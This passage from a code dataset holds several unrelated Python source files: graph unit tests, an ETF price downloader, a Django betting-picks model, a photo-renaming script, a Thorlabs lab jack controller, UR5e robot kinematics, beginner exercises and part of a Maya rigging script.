chat\")\n\n\nadd_msft_account_to_commands()\n","repo_name":"Santhoshkumard11/Voice-Collab","sub_path":"python_scripts/_command_mapping.py","file_name":"_command_mapping.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"1560049646","text":"from dataclasses import dataclass\nimport pytest\nfrom GDM.Graph import Graph, Node, Edge\n\ndef test_get_node():\n G = Graph()\n G.add_default_node('1')\n assert G.get_node('1').name == '1'\n with pytest.raises(KeyError):\n G.get_node('2')\n\ndef test_add_node():\n @dataclass\n class TestNode(Node):\n test: int\n\n G = Graph()\n G.add_node(Node('1', 1.9, 1.0, False, set()))\n \n n = G.get_node('1')\n assert n.name == '1'\n assert n.reward == 1.9\n assert n.utility == 1.0\n assert n.is_terminal == False\n\n with pytest.raises(AssertionError):\n G.add_node('21')\n\n with pytest.raises(AssertionError):\n G.add_node('1')\n\n\n G.add_node(TestNode('2', 1.0, 2.0, True, set(), 12))\n assert G.get_node('2').test == 12\n\ndef test_remove_node_simple_case():\n G = Graph()\n G.add_default_node('2')\n\n with pytest.raises(AssertionError):\n G.remove_node('1')\n\n G.remove_node('2')\n assert '2' not in G.nodes\n assert len(G.nodes) == 0\n\ndef test_remove_node_outgoing_edges():\n G = Graph()\n G.add_default_node('1')\n for i in range(2, 20):\n G.add_default_node(str(i))\n G.add_default_edge('1', str(i))\n\n assert len(G.nodes) == 19\n assert len(G.edges) == 18\n \n G.remove_node('1')\n assert len(G.nodes) == 18\n assert len(G.edges) == 0\n\ndef test_remove_node_incoming_edges():\n G = Graph()\n G.add_default_node('1')\n for i in range(2, 20):\n G.add_default_node(str(i))\n G.add_default_edge('1', str(i))\n\n for i in range(2, 20):\n G.add_default_edge(str(i), '1')\n \n G.remove_node('1')\n assert len(G.edges) == 0\n for i in range(2, 20):\n assert len(G.neighbors(str(i))) == 0\n\ndef test_remove_noce_edge_probabilities():\n G = Graph()\n G.add_default_node('1')\n G.add_default_node('2')\n G.add_default_node('3')\n G.add_default_node('4')\n\n G.add_default_edge('1', '2', [('2', 0.5), ('3', 0.25), ('4', 0.25)])\n\n G.remove_node('4')\n\n assert '2' in G.neighbors('1')\n assert '4' not in G.neighbors('1')\n\n edge = G.get_edge('1', '2')\n assert ('2', 0.625) in edge.probability\n assert ('3', 0.375) in edge.probability\n\ndef test_get_edge():\n G = Graph()\n G.add_default_node('1')\n G.add_default_node('2')\n G.add_default_edge('1','2')\n\n assert ('1','2') in G.edges\n assert G.get_edge('1','2').tgt == '2'\n\ndef test_custom_edge():\n @dataclass\n class CustomEdge(Edge):\n q: int\n\n G = Graph()\n with pytest.raises(AssertionError):\n G.add_edge('1')\n\n G.add_default_node('1')\n G.add_default_node('2')\n G.add_edge(CustomEdge('1', '2', [('2', 1.0)], 3))\n\n assert ('1', '2') in G.edges\n assert len(G.edges) == 1\n assert G.get_edge('1', '2').q == 3\n assert '2' in G.get_node('1').neighbors\n\n\ndef test_remove_edge():\n print('remove_edge needs to remove tgt_node from src_node\\'s neighbors.')\n\n G = Graph()\n G.add_default_node('a')\n G.add_default_node('b')\n G.add_default_edge('a', 'b')\n assert len(G.edges) == 1\n \n G.remove_edge('a', 'b')\n assert len(G.edges) == 0\n assert len(G.neighbors('a')) == 0\n assert len(G.neighbors('b')) == 0\n\ndef test_neighbors():\n G = Graph()\n G.add_default_node('1')\n G.add_default_node('2')\n G.add_default_node('3')\n \n G.add_default_edge('1', '2')\n G.add_default_edge('1', '3')\n G.add_default_edge('2', '3')\n\n assert '2' in G.neighbors('1')\n assert '3' in G.neighbors('1')\n assert len(G.neighbors('1')) == 2\n\n assert '3' in G.neighbors('2')\n assert len(G.neighbors('2')) == 1\n\n assert len(G.neighbors('3')) == 0\n\ndef test_set_node_utilities():\n G = Graph()\n for i in range(10):\n G.add_default_node(str(i), utility=i)\n\n new_utility_values = {}\n for i in range(10):\n new_utility_values[str(i)] = 0\n assert G.utility(str(i)) == i\n\n G.set_node_utilities(new_utility_values)\n\n for i in range(10):\n assert G.utility(str(i)) == 0\n\ndef test_map_nodes():\n G = Graph()\n for i in range(10):\n G.add_default_node(str(i))\n\n def modifier(n: Node):\n n.reward = 10\n n.is_terminal = True\n\n G.map_nodes(modifier)\n\n for i in range(10):\n key = str(i)\n assert G.reward(key) == 10\n assert G.is_terminal(key) == True\n\ndef test_map_edges():\n @dataclass\n class CustomEdge(Edge):\n q: float = 0\n\n G = Graph()\n G.add_default_node('1')\n G.add_default_node('2')\n G.add_default_node('3')\n\n G.add_edge(CustomEdge('1', '2', [('2', 1.0)]))\n G.add_edge(CustomEdge('1', '3', [('3', 1.0)]))\n\n edge: CustomEdge\n for edge in G.edges.values():\n assert edge.q == 0\n\n def adjust_q_values(e: CustomEdge):\n e.q = 10\n\n G.map_edges(adjust_q_values)\n for edge in G.edges.values():\n edge.q = 10\n","repo_name":"bi3mer/GDM","sub_path":"Tests/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":4837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39840724272","text":"from pandas_datareader import data\nimport pandas as pd\nimport math\n\n# Names of ETF tickers (can be extended), mentioned below are traded on eToro\ntickers = ['AAXJ', 'ACWI', 'AGG', 'AMLP', 'AOA', 'AOK', 'AOR', 'BIL', 'BKLN', 'BLV', 'BND', 'BSV', 'CORN', 'CQQQ',\n 'DBA', 'DBO', 'DIA', 'DJP', 'DUST', 'DVY', 'EEM', 'EFA', 'EMB', 'ERX', 'EWG', 'EWH', 'EWJ', 'EWL', 'EWN',\n 'EWT', 'EWW', 'EWY', 'EWZ', 'EZU', 'FAS', 'FAZ', 'FEZ', 'FXI', 'GDX', 'GDXJ', 'GLD', 'HDV', 'HYG', 'IAEX.L',\n 'IAU','ABB', 'IDEM.L', 'IEF', 'IEML.L', 'IFFF.L', 'IHI', 'IJH', 'IJJ', 'IJPE.L', 'IJR', 'ILTB', 'IMEU.L',\n 'IMIB.L', 'ISF.L', 'ITOT','ITWN.L', 'IUKP.L', 'IUSA.L', 'IUSG', 'IUSV', 'IVV', 'IVW', 'IWB', 'IWF', 'IWM',\n 'IWN', 'IWO', 'IWR', 'IWS', 'IXJ', 'JNK', 'KBE','KRE', 'LIT', 'LQD', 'MCHI', 'MDY', 'MINT', 'MUB', 'NUGT',\n 'OIH', 'PALL', 'PFF', 'PGX', 'PHYS', 'PPLT', 'PSLV', 'QQQ', 'RSX', 'RWR', 'SCHE', 'SCHF', 'SCHX', 'SCO',\n 'SDIV', 'SDOW', 'SDS', 'SEMB.L', 'SH', 'SHV', 'SHY', 'SKYY', 'SLV', 'SMH', 'SOXL', 'SOXS', 'SOXX', 'SPLV',\n 'SPXL', 'SPXS', 'SPXU', 'SPY', 'SPYG', 'SQQQ', 'SRTY', 'SSO', 'SWDA.L', 'TAN', 'TFI', 'THD', 'TIP', 'TLT',\n 'TMF', 'TNA', 'TQQQ', 'TVIX', 'TZA', 'UCO', 'UDOW', 'UGA', 'UNG', 'UPRO', 'USL', 'USO', 'USRT', 'VB', 'VBK',\n 'VBR', 'VCIT', 'VCSH', 'VEA', 'VEU', 'VFH', 'VGK', 'VGT', 'VHT', 'VIG', 'VNQ', 'VO', 'VOE', 'VONG', 'VOO',\n 'VOOG', 'VOOV', 'VOX', 'VTI', 'VTV', 'VUG', 'VWO', 'VXUS', 'XBI', 'XCX5.L', 'XLB', 'XLE', 'XLF', 'XLI',\n 'XLK', 'XLP', 'XLU', 'XLV', 'XLY', 'XOP', 'XS6R.L', 'YINN']\n\ndef getData(start: str, end: str, type: str):\n \"\"\"\n Function to download data for Master Thesis from Yahoo! Finance database and save it into Excel file.\n \"\"\"\n # DOWNLOAD THE ADJUSTED DAILY PRICES FROM YAHOO DATABASE\n dataset = data.DataReader(tickers, 'yahoo', start, end)[\"Adj Close\"]\n\n print(\"POST-PROCESSING THE DATA\")\n # DATA CLEANING\n # if the first of the last value is nan, delete\n to_drop_name = []\n for i, column in enumerate(dataset.columns):\n try:\n # Do we have data from the beginning?\n if math.isnan(dataset[str(column)][0]):\n to_drop_name.append(column)\n # Do we have data at the end?\n if math.isnan(dataset[str(column)][-1]):\n to_drop_name.append(column)\n except:\n to_drop_name.append(column)\n\n dataset = dataset.drop(columns=to_drop_name, axis=1)\n\n # then loop and test if any data pint is missing, if yes, then manage\n for k in range(len(dataset.columns)):\n for i in range(len(dataset.index)):\n if math.isnan(float(dataset.iloc[i, k])):\n dataset.iloc[i, k] = dataset.iloc[i - 1, k].copy()\n\n if type == 'daily_returns':\n # we got daily prices\n dailyPrices = dataset\n\n # Get daily returns\n dailyReturns = dailyPrices.pct_change().drop(dailyPrices.index[0]) # drop first NaN row\n result = dailyReturns\n\n elif type == 'weekly_returns':\n # we got daily prices\n dailyPrices = dataset\n\n # GET WEEKLY RETURNS\n # Get prices only for Wednesdays and delete Nan columns\n pricesWed = dailyPrices[dailyPrices.index.weekday == 2].dropna(axis=1)\n\n # Get weekly returns\n weeklyReturns = pricesWed.pct_change().drop(pricesWed.index[0]) # drop first NaN row\n result = weeklyReturns\n\n else:\n result = dataset\n\n return result\n\n\nif __name__ == \"__main__\":\n # ** Download the data from Yahoo! **\n # set up: starting date, ending date and type (price, daily_returns, weekly_returns)\n print(\"DOWNLOADING THE DATA, IT CAN TAKE A WHILE\")\n data = getData(start='2021-05-24', end='2021-07-01', type='weekly_returns')\n\n print(\"SAVING INTO EXCEL\")\n # ** save data into excel file **\n data.to_excel(\"yahooData.xlsx\", sheet_name=\"data_for_thesis\")\n\n print(\"THE PROCESS IS DONE\")","repo_name":"VanekPetr/Get_ETF_data_from_Yahoo","sub_path":"extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38295520847","text":"from django.db import models\nfrom django.utils import timezone\nfrom django.contrib.auth import get_user_model\n\nimport csv\nfrom datetime import datetime\n\nimport scripts\n# Create your models here.\nCSV = 'csv_files/nfl_schedule.csv'\n# deployment '/home/kilgoretrout1/nba-picks/csv_files/nfl_schedule.csv'\n\n\nclass Week(models.Model):\n week = models.IntegerField()\n\n def __str__(self):\n return \"Week {}\".format(self.week)\n\n\nclass Game(models.Model):\n week = models.ForeignKey('Week', on_delete=models.CASCADE)\n home_team = models.CharField(max_length=30)\n away_team = models.CharField(max_length=30)\n home_spread = models.FloatField(null=True)\n away_spread = models.FloatField(null=True)\n date_time = models.DateTimeField()\n home_score = models.FloatField(null=True)\n away_score = models.FloatField(null=True)\n\n def __str__(self):\n dt = str(self.date_time)[:11]\n s = f\"{dt} {self.week} {self.away_team} vs. {self.home_team}\"\n return s\n\n class Meta:\n ordering = ['pk']\n \n @classmethod\n def create(cls,week, home_team, away_team, date_time):\n game = cls(week=week, home_team=home_team, away_team=away_team, date_time=date_time)\n return game\n\n @classmethod\n def upload_games(cls):\n with open(CSV) as file:\n csv_reader = csv.DictReader(file)\n\n for row in csv_reader:\n\n w = row['week']\n week = Week.objects.get(pk=w)\n home_team = row['home_team']\n away_team = row['away_team']\n\n date = row['date']\n time = row['time']\n dt = date + \" \" + time\n dt_object = datetime.strptime(dt, \"%m/%d/%y %I:%M%p\")\n aware_dt = timezone.make_aware(dt_object)\n\n game = cls.create(week, home_team, away_team, aware_dt )\n game.save()\n\nclass Pick(models.Model):\n\n choices = [('win', 'win'),\n ('loss', 'loss'),\n ('push', 'push')\n ]\n\n user = models.ForeignKey(get_user_model(), on_delete=models.CASCADE, related_name='nfl_pick_user')\n game = models.ForeignKey('Game', on_delete=models.CASCADE)\n pick = models.CharField(max_length=40)\n wager = models.FloatField(null=True, default=0)\n outcome = models.CharField(max_length=5, choices=choices, null=True)\n \n def __str__(self):\n return \"{} | {} {}\".format(self.game, self.user, self.pick)\n\n def get_pick(self):\n points = float(self.pick.split()[-1])\n team = ' '.join(self.pick.split()[:-1])\n if points < 0:\n return \"{} {}\".format(team, points)\n elif points > 0:\n return \"{} +{}\".format(team, points)\n \n def get_outcome(self):\n info = self.pick.split()\n team = \" \".join(info[:-1])\n line = info[-1]\n\n game = self.game\n\n if team == game.home_team:\n score = game.home_score + float(line)\n if score - game.away_score > 0:\n self.outcome = 'win'\n elif score - game.away_score < 0:\n self.outcome = 'loss'\n elif score - game.away_score == 0:\n self.outcome = 'push'\n \n elif team == game.away_team:\n score = game.away_score + float(line)\n if score - game.home_score > 0:\n self.outcome = 'win'\n elif score - game.home_score < 0:\n self.outcome = 'loss'\n elif score - game.home_score == 0:\n self.outcome = 'push'\n\nclass Nfl_Record(models.Model):\n user = models.OneToOneField(get_user_model(), on_delete=models.CASCADE)\n wins = models.PositiveIntegerField(default=0)\n losses = models.PositiveIntegerField(default=0)\n pushes = models.PositiveIntegerField(default=0)\n in_wins = models.PositiveIntegerField(default=0)\n in_losses = models.PositiveIntegerField(default=0)\n in_pushes = models.PositiveIntegerField(default=0)\n\n def __str__(self):\n return f\"{self.user} NFL Record: {self.wins}-{self.losses}-{self.pushes}\"\n\n def update_record(self):\n picks = Pick.objects.filter(user=self.user)\n w = 0\n l = 0\n p = 0\n for pick in picks:\n \n if pick.outcome == 'win':\n w += 1\n elif pick.outcome == 'loss':\n l += 1\n elif pick.outcome == 'push':\n p += 1\n self.wins = w + self.in_wins\n self.losses = l +self.in_losses\n self.pushes = p + self.in_pushes\n\n def get_winning_percentage(self):\n if self.wins + self.losses + self.pushes > 0:\n wp = round(float(self.wins/(self.wins + self.losses) * 100), 1)\n return wp\n else:\n return 0","repo_name":"npally/sports-betting","sub_path":"nfl/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4796,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"15180953584","text":"import ffmpeg\nimport os\nfrom PIL import Image\n\nimgFormats = ['png', 'jpg', 'jpeg']\nvideoFormats = ['m4v', 'mov', 'mp4']\n\ndef date_img(path: str) -> str:\n return Image.open(path)._getexif()[36867]\n\ndef date_vid(path: str) -> str:\n return ffmpeg.probe(path)[\"streams\"][1][\"tags\"][\"creation_time\"].replace(\n 'T', ' '\n ).replace(\n '-', ':'\n ).split('.')[0]\n\ndef endswith_one_of_extensions(file: str, extensions: list[str]) -> bool:\n for ext in extensions:\n if file.endswith(ext):\n return True\n return False\n\ndef timestamp_filename(timestamp: str, extension: str) -> str:\n return timestamp.replace(':','').replace(' ', '_') + '.' + extension\n\ndef change_name_until_success(old_filename: str, new_filename: str):\n print('Changing name from: ' + old_filename + ' to: ' + new_filename)\n i = 1\n while True:\n try:\n if i == 1:\n os.rename(old_filename, new_filename)\n break\n else:\n os.rename(\n old_filename, \n new_filename.split('.')[0] + \n ' (' + str(i) + ').' + \n new_filename.split('.')[1]\n )\n break\n except FileExistsError:\n i += 1\n\ndef main():\n for old_filename in os.listdir():\n if not old_filename.endswith('.py'):\n new_filename = ''\n extension = old_filename.split('.')[-1]\n if endswith_one_of_extensions(old_filename.lower(), videoFormats):\n # Working for Redmi Note 8 Pro, maybe other devices\n new_filename = timestamp_filename(date_vid(old_filename), extension)\n if endswith_one_of_extensions(old_filename.lower(), imgFormats):\n new_filename = timestamp_filename(date_img(old_filename), extension)\n change_name_until_success(old_filename, new_filename)\n \n\nif __name__ == \"__main__\":\n main()","repo_name":"BorowiecM127/Filename-to-timestamp-renamer","sub_path":"rename_images_to_timestamps.py","file_name":"rename_images_to_timestamps.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36280899320","text":"\"\"\"\r\nThorlabsのラボジャッキMLJ150/Mを制御するプログラム。\r\nラボジャッキの上下を行う。使用する前にnoticeを確認してください。\r\nnotice:\r\n1.シリアル番号の確認\r\n使用する機器の本体に記載されている8桁のシリアルナンバーを確認し、\r\n21行目に記載されているserial=''を更新してください。\r\n2.MSL-Equipmentのインストール\r\nMLJ150/Mを制御するためのモジュールをインストールしてください。\r\n3.kinesisのインストール\r\nTHORLABSのライブラリ群であるkinesisをダウンロードしてください。\r\nダウンロードしたフォルダがC:/Program Files/Thorlabs/Kinesisにあるか確認してください。\r\n\r\n以上の1~3の手順は以下の記事を参照してください。\r\nhttps://qiita.com/opto-line/items/68e144b2ee2e5b733f3d\r\n\"\"\"\r\nimport datetime\r\nimport os\r\nimport sys\r\nimport time \r\n\r\nfrom msl.equipment import Backend, ConnectionRecord, EquipmentRecord\r\nfrom msl.equipment.resources.thorlabs import MotionControl\r\n\r\n# ensure that the Kinesis folder is available on PATH\r\nos.environ['PATH'] += os.pathsep + 'C:/Program Files/Thorlabs/Kinesis'\r\n\r\n# rather than reading the EquipmentRecord from a database we can create it manually\r\nRECORD = EquipmentRecord(\r\n manufacturer='Thorlabs',\r\n model='MLJ150/M', # update the model number for your Integrated Stepper Motor\r\n serial='49907500', # update the serial number for your Integrated Stepper Motor\r\n connection=ConnectionRecord(\r\n backend=Backend.MSL,\r\n address='SDK::Thorlabs.MotionControl.IntegratedStepperMotors.dll',),)\r\n\r\n# When device position is 30000000, absolute position from home is 25mm\r\nCONVFACTOR = 30000000/25\r\n\r\ndef abs_to_dev_pos(abs_pos):\r\n \"\"\"\r\n When device position is 30000000, absolute position from home is 25mm\r\n factor = 30000000/25\r\n \"\"\"\r\n global CONVFACTOR\r\n dev_pos = round(abs_pos*CONVFACTOR)\r\n \r\n return dev_pos\r\n\r\ndef dev_to_abs_pos(dev_pos):\r\n \"\"\"\r\n When device position is 30000000, absolute position from home is 25mm\r\n factor = 30000000/25\r\n \"\"\"\r\n global CONVFACTOR\r\n abs_pos = dev_pos*(1/CONVFACTOR)\r\n \r\n return abs_pos\r\n\r\ndef logprint(message=''):\r\n \"\"\"\r\n printing ='on'\r\n print and return None\r\n \"\"\"\r\n form = '[{}, {}]'.format(datetime.datetime.now(), message)\r\n print(form)\r\n\r\ndef jack_status():\r\n\r\n global RECORD\r\n motor = RECORD.connect()\r\n motor.start_polling(200)\r\n logprint(f'Current position: {dev_to_abs_pos(motor.get_position())} [mm]')\r\n logprint(f'Current position: {motor.get_position()} [device units]')\r\n motor.stop_polling()\r\n motor.disconnect()\r\n\r\n return motor.get_position(), dev_to_abs_pos(motor.get_position())\r\n \r\ndef jack_move(abs_pos):\r\n \"\"\"\r\n abs_pos: absolute position from home at unit mm.\r\n\r\n \"\"\"\r\n global RECORD\r\n dev_pos = abs_to_dev_pos(abs_pos)\r\n\r\n # connect to the Integrated Stepper Motor\r\n motor = RECORD.connect()\r\n logprint('connected is success')\r\n \r\n # start polling at 200 ms\r\n motor.start_polling(200)\r\n logprint('jack move..')\r\n \r\n logprint(f'Current position: {dev_to_abs_pos(motor.get_position())} [mm]')\r\n logprint(f'Current position: {motor.get_position()} [device units]')\r\n\r\n # move to position(machine unit)\r\n motor.move_to_position(dev_pos)\r\n print('Moving jack move done.')\r\n\r\n motor.stop_polling()\r\n\r\n # position = motor.get_position()\r\n # real = motor.get_real_value_from_device_unit(position, 'DISTANCE')\r\n # print(' at position {} [device units] {:.3f} [real-world units]'.format(position, real))\r\n\r\n motor.disconnect()\r\n\r\ndef jack_relative_move(abs_shift):\r\n \"\"\"\r\n abs_shift: absolute shift from current position at unit mm.\r\n direction toword home is negative\r\n \r\n \"\"\"\r\n global RECORD\r\n motor = RECORD.connect()\r\n current_dev_pos = motor.get_position()\r\n \r\n dev_shift= abs_to_dev_pos(abs_shift)\r\n\r\n dev_pos = current_dev_pos + dev_shift\r\n\r\n logprint(f'Current position: {dev_to_abs_pos(motor.get_position())} [mm]')\r\n logprint(f'Current position: {motor.get_position()} [device units]')\r\n logprint(f'Shift Value: {dev_shift}[device units]: Goto {dev_pos}[device units]')\r\n\r\n\r\n motor.start_polling(200)\r\n logprint('move...')\r\n # move to position(machine unit)\r\n motor.move_to_position(dev_pos)\r\n\r\n # wait(1)\r\n print('Moving jack move done.')\r\n \r\n\r\n motor.stop_polling()\r\n motor.disconnect()\r\n \r\n\r\ndef jack_home():\r\n \"\"\"\r\n Jack home. Jack move to the home position.\r\n :return:\r\n \"\"\"\r\n global RECORD\r\n print('[', datetime.datetime.now(), ']', 'homing...')\r\n # connect to the Integrated Stepper Motor\r\n motor = RECORD.connect()\r\n # start polling at 200 ms\r\n motor.start_polling(200)\r\n # home the device\r\n motor.home()\r\n\r\n motor.stop_polling()\r\n logprint(f'homing done. at position {motor.get_position()} [device units]')\r\n \r\n motor.disconnect()\r\n\r\n\r\n# def _wait(obj):\r\n# obj.clear_message_queue()\r\n# while True:\r\n# status = obj.convert_message(*obj.wait_for_message())['id']\r\n# if status == 'Homed' or status == 'Moved':\r\n# break\r\n# position = obj.get_position()\r\n# real = obj.get_real_value_from_device_unit(position, 'DISTANCE')\r\n# print(' at position {} [device units] {:.3f} [real-world units]'.format(position, real))\r\n\r\n\r\ndef check_device_info():\r\n \"\"\"\r\n Get device info including serial number.\r\n :return:\r\n \"\"\"\r\n print('Building the device list...')\r\n MotionControl.build_device_list()\r\n\r\n n_devices = MotionControl.get_device_list_size()\r\n if n_devices == 0:\r\n print('There are no devices in the device list')\r\n sys.exit(0)\r\n elif n_devices == 1:\r\n print('There is 1 device in the device list')\r\n else:\r\n print('There are {} devices in the device list'.format(n_devices))\r\n\r\n all_devices = MotionControl.get_device_list()\r\n print('The serial numbers of all the devices are: {}'.format(all_devices))\r\n\r\n filter_flippers = MotionControl.get_device_list(MotionControl.Filter_Flipper)\r\n print('The Filter Flipper\\'s that are connected are: {}'.format(filter_flippers))\r\n\r\n lts = MotionControl.get_device_list(MotionControl.Long_Travel_Stage)\r\n print('The Long Travel Stage\\'s that are connected are: {}'.format(lts))\r\n\r\n devices = MotionControl.get_device_list(MotionControl.Filter_Flipper, MotionControl.Long_Travel_Stage)\r\n print('The Filter Flipper\\'s and Long Travel Stage\\'s that are connected are: {}'.format(devices))\r\n\r\n info = MotionControl.get_device_info(all_devices[0])\r\n print('The device info for the device with serial# {} is:'.format(all_devices[0]))\r\n for item in dir(info):\r\n if item.startswith('_'):\r\n continue\r\n print(' {}: {}'.format(item, getattr(info, item)))\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n check_device_info()\r\n # jack_home()\r\n # jack_status()\r\n # jack_move(6.88)\r\n\r\n # jack_status()\r\n # jack_relative_move(1)\r\n # jack_status()\r\n # jack_move(3.27)\r\n \r\n\r\n \r\n \r\n","repo_name":"SGyutan/Thorlabs_ML150M","sub_path":"lab_jack_lib.py","file_name":"lab_jack_lib.py","file_ext":"py","file_size_in_byte":7230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25525286616","text":"import roboticstoolbox as rtb\nfrom numpy import pi, cos, sin, array, ndarray\n\n# UR5e Modified Denavit-Hartenberg parameters\na2 = 0.425\na3 = 0.3922\nd1 = 0.1625\nd4 = 0.1333\nd5 = 0.0997\nd6 = 0.0996\n\n# UR5e kinematics using Robotics Toolbox\nclass UR5e(rtb.DHRobot):\n def __init__(self):\n L1 = rtb.RevoluteMDH(d=d1, a=0, alpha=0)\n L2 = rtb.RevoluteMDH(d=0, a=0, alpha=pi/2)\n L3 = rtb.RevoluteMDH(d=0, a=a2, alpha=0)\n L4 = rtb.RevoluteMDH(d=d4, a=a3, alpha=0)\n L5 = rtb.RevoluteMDH(d=d5, a=0, alpha=pi/2)\n L6 = rtb.RevoluteMDH(d=d6, a=0, alpha=-pi/2)\n super().__init__([L1, L2, L3, L4, L5, L6],name=\"UR5e\")\n\n\n# UR5e Forward kinematics transformation\ndef UR5eFK(j1, j2, j3, j4 , j5, j6):\n T_0_1 = array([[cos(j1), -sin(j1), 0, 0],[sin(j1), cos(j1), 0, 0],[0, 0, 1, d1],[0,0,0,1]])\n T_1_2 = array([[cos(j2), -sin(j2), 0, 0],[0, 0, -1, 0],[sin(j2), cos(j2), 0, 0],[0,0,0,1]])\n T_2_3 = array([[cos(j3), -sin(j3), 0, a2],[sin(j3), cos(j3), 0, 0],[0,0,1,0],[0,0,0,1]])\n T_3_4 = array([[cos(j4), -sin(j4), 0, a3],[sin(j4), cos(j4), 0, 0],[0, 0, 1, d4],[0,0,0,1]])\n T_4_5 = array([[cos(j5), -sin(j5), 0, 0],[0,0,-1,-d5],[sin(j5), cos(j5), 0, 0],[0,0,0,1]])\n T_5_6 = array([[cos(j6), -sin(j6), 0, 0],[0,0,1,d6],[-sin(j6),-cos(j6), 0,0],[0,0,0,1]])\n T_0_6 = T_0_1 @ T_1_2 @ T_2_3 @ T_3_4 @ T_4_5 @ T_5_6\n print(ndarray.round(T_0_6,4))\n\n\nsb = UR5e()\nq = [pi/2,0,0,pi/3,0,0]\nprint(\"Forward Kinematics from MDH parameters and Robotics Toolbox:\")\nprint(sb.fkine(q))\nprint(\"Forward Kinematics from manually defined transformation matrices:\")\nUR5eFK(q[0], q[1], q[2], q[3], q[4], q[5])","repo_name":"Daniella1/UR-kinematics","sub_path":"UR5e/UR5e_forward_kinematics.py","file_name":"UR5e_forward_kinematics.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26771950899","text":"# Count Multi X:\n\n# Write a function named count_multi_char_x that takes a string\n# named word and a string named x. This function should do the\n# same thing as the count_char_x function you just wrote - it should\n# return the number of times x appears in word. However, this time,\n# make sure your function works when x is multiple characters long.\n\n# For example, count_multi_char_x(\"Mississippi\", \"iss\") should return 2\n\n# Write your count_multi_char_x function here:\ndef count_multi_char_x(word, x):\n count = 0\n x = \"\".join(set(x))\n for i in range(len(x)):\n if x[i] in word:\n count += 1\n return count\n\n\n# Uncomment these function calls to test your function:\nprint(count_multi_char_x(\"mississippi\", \"iss\"))\n# should print 2\nprint(count_multi_char_x(\"apple\", \"pp\"))\n# should print 1\n\n\n######## Better Answer incase I need to look at sequence of char #######\n\n\ndef seq_count(string, seq):\n n = len(seq)\n m = len(string)\n count = 0\n for i in range(len(string)):\n if string[i : i + n] == seq:\n count += 1\n return count\n\n\nprint(seq_count(\"issmississippiss\", \"iss\"))\n","repo_name":"kasem777/Python-codeacademy","sub_path":"Loops/count_multi_X.py","file_name":"count_multi_X.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70121743085","text":"\njohn_salary = 1.500\nmarta_salary = 2.500\njohn_age = 24\nmarta_age = 35\njohn_name = \"John\"\nmarta_name = \"Marta\"\njohn_gender = False\nmarta_gender = True\njohn_friends = [\"Bill\", \"Anna\", \"Alex\", \"Bill\"]\nmarta_friends = [\"Max\",\"Peter\",\"Yana\", \"Mike\"] \ntest_list_of_names = [\"Max\",\"Peter\",\"Yana\", \"Mike\", \"Bill\", \"Anna\", \"Alex\", \"Bill\"]\n\n\nprint (f'Name of user 1 - {marta_name}, \\nage = {marta_age},\\nsalary = {marta_salary:.3f},\\ngender = {marta_gender},\\nlist of friends {marta_friends}\\n')\nprint (f'Name of user 2 - {john_name}, \\nage ={john_age}, \\nsalary = {john_salary:.3f}, \\ngender = {john_gender}, \\nlist of friends {john_friends}\\n')\nprint (f'List of users without dublicates {set(test_list_of_names)}')","repo_name":"ProtsenkoM/Home_works","sub_path":"homework_task_1/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9645848183","text":"import maya.cmds as cmds\nfrom ..base import control\nfrom ..base import module\nfrom ..rigLib import lib\n\nreload(control)\nreload(module)\nreload(lib)\n\n\ndef createRig(vertexList,\n prefix='L_',\n rigPartName='',\n rigScale=1.0,\n addSliderCtrls=True,\n jointParent=''):\n\n cmds.select(cl=1)\n\n # create module\n rigModule = module.Module(prefix=prefix,\n rigPartName=rigPartName)\n\n # create joint on each vertex\n jointList = lib.vertex2Joints(vertexList=vertexList,\n prefix=prefix,\n rigPartName=rigPartName,\n addSlaveAttr=True)\n\n # parent created joint to target joint\n if jointParent:\n for i in jointList:\n cmds.select(cl=1)\n cmds.parent(i, jointParent)\n cmds.select(cl=1)\n\n # add control for each joint\n jointCtrlList = []\n jointCtrlGrpList = []\n # create controls\n for i in xrange(len(jointList)):\n jointCtrl = control.Control(prefix=jointList[i],\n rigPartName='',\n scale=rigScale * 0.2,\n translateTo=jointList[i],\n rotateTo=jointList[i],\n shape='circleY')\n\n cmds.pointConstraint(jointCtrl.C, jointList[i], mo=0)\n cmds.orientConstraint(jointCtrl.C, jointList[i], mo=0)\n\n jointCtrlList.append(jointCtrl.C)\n jointCtrlGrpList.append(jointCtrl.Off)\n\n # connect the attribute\n for i in jointList:\n cmds.connectAttr(rigModule.topGrp + '.' + prefix + rigPartName + '_Jnt',\n i + '.' + prefix + rigPartName, f=1)\n\n # slider controls\n slideCtrlList = []\n slideCtrlGrpList = []\n\n if addSliderCtrls:\n for i in xrange(len(jointList)):\n slideCtrl = control.Control(prefix=prefix,\n rigPartName=rigPartName + '_Jnt_' + str(i) + '_SLD',\n scale=rigScale * 0.5,\n shape='planeSliderControl',\n lockChannels=['ty', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v'])\n\n slideCtrlList.append(slideCtrl.C)\n slideCtrlGrpList.append(slideCtrl.Off)\n\n # cleanHierarchy\n for i in jointCtrlGrpList:\n cmds.parent(i, rigModule.topGrp)\n\n if addSliderCtrls:\n rigModuleSliderGrp = cmds.group(n=prefix + rigPartName + '_SLD_Grp', em=1)\n for i in slideCtrlGrpList:\n 